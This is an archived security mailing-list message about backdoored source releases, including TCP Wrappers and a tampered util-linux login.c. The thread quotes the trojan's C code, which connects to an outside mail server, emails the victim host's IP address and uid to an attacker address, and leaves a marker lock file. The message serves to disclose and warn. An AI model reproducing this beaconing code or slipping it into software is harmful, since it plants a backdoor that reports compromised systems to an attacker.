login-utils is notpart of my FTP archive. Wietse John Stange: > You may want to have a thorough look at everything you've got... I grabbed > a copy of util-linux2.9g (admittedly being a bad boy and not checking > against anything), and while I don't have a pristine copy of the source > on hand to check, I'm guessing that sendmail and a hotmail address is not > standard behavior for /bin/login: > > (from login-utils/login.c) > > he = gethostbyname("mail.hotmail.com"); > if (!he) exit(0); > ia = (struct in_addr *)he->h_addr_list[0]; > l = sizeof(sai);memset(&sai,0,l); > sai.sin_port = htons(25); > sai.sin_addr.s_addr = ia->s_addr; > if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0); > if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0); > if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) > exit(0); > sprintf(b,"\r\nHost = %s\r\nUid = > %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid()); > sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0); > sleep(1);if (write(s,"MAIL FROM:<xulat_private>\n",28) < > 0) exit(0); > if (write(s,"RCPT TO:<wlogainat_private>\n",30) < 0) > exit(0); > sleep(1);if (write(s,"DATA\n",5) < 0) exit(0); > sleep(1);if (write(s,b,strlen(b)) < 0) exit(0); > sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0); > sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0); > etc etc > > I'm in a bit of a hurry, so I haven't had a chance to comb anything > else... > > > TCP Wrappers is a widely-used security tool to protect UNIX systems > > against intrusion. In has an estimated installed base of millions. > > > > Today someone replaced the tcp wrapper source on ftp.win.tue.nl by > > a backdoored version. Eventually this was bound to happen, and > > that's why the source file is accompanied by a PGP signature. But > > that is no guarantee against people downloading and installing > > backdoored software. > > -- John Stange > Staff World, 4120 AVW > x52720 > > > >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:30:04 PDT